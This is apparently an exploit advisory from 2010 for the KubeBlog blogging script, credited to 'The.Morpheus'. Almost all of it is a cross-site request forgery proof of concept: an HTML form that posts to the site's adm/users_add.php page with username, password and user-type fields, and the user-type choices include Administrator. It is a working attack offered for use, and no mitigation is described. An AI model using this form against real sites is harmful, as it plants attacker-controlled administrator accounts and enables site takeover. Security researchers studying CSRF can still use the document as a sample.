========================================================================================
| # Title : KubeBlog XSRF Vuln.
| # Author : The.Morpheus
| # email : fats0L@windowslive.com
| # Home : http://www.spyturks.com
| # Date : 03.05.2010
| # Script : Copyright © 2008 Kubelabs.com All Rights Reserved
| # Tested on: http://demos.kubelabs.com/kubeblog
| # Bug : Yeni User Eklenebilinir.
====================== Exploit By The.Morpheus =================================
# Exploit :
<form name="form1" method="post" action="http://[vuln_site]/kubeblog/adm/users_add.php">
<table width="70%" cellpadding="0" cellspacing="2" border="0">
<tr>
<td width="35%"> </td>
<td width="65%"> </td>
</tr>
<tr>
<td><strong>Username (<a href="#" onClick="MM_openBrWindow('help.php?id=6','help','width=500,height=200')">?</a>)</strong></td>
<td>:<input name="username" type="Text" class="textbox" id="username" style="width:60%" value=""><span class="error"></span></td>
</tr>
<tr>
<td><strong>Password (<a href="#" onClick="MM_openBrWindow('help.php?id=7','help','width=500,height=200')">?</a>)</strong></td>
<td>:<input name="password" type="password" class="textbox" id="password" style="width:60%" value=""><span class="error"></span></td>
</tr>
<tr>
<td><strong>Confirm Password (<a href="#" onClick="MM_openBrWindow('help.php?id=8','help','width=500,height=200')">?</a>)</strong></td>
<td>:<input name="password2" type="password" class="textbox" id="password2" style="width:60%" value=""></td>
</tr>
<tr>
<td><strong>User Type (<a href="#" onClick="MM_openBrWindow('help.php?id=9','help','width=500,height=200')">?</a>)</strong></td>
<td>:
<select name="user_type">
<option value='2'>User</option><option value='3'>Administrator</option><option value='4'>Moderator</option> </select>
</td>
</tr>
<tr>
<td> </td>
<td> </td>
</tr>
<tr>
<td></td>
<td height="30" style="padding-left:6px;">
<input name="Submit" type="submit" class="button" value="Submit">
<input name="Reset" type="reset" class="button" value="Reset">
</td>
</tr>
</table>
</form></td>
############################################################################################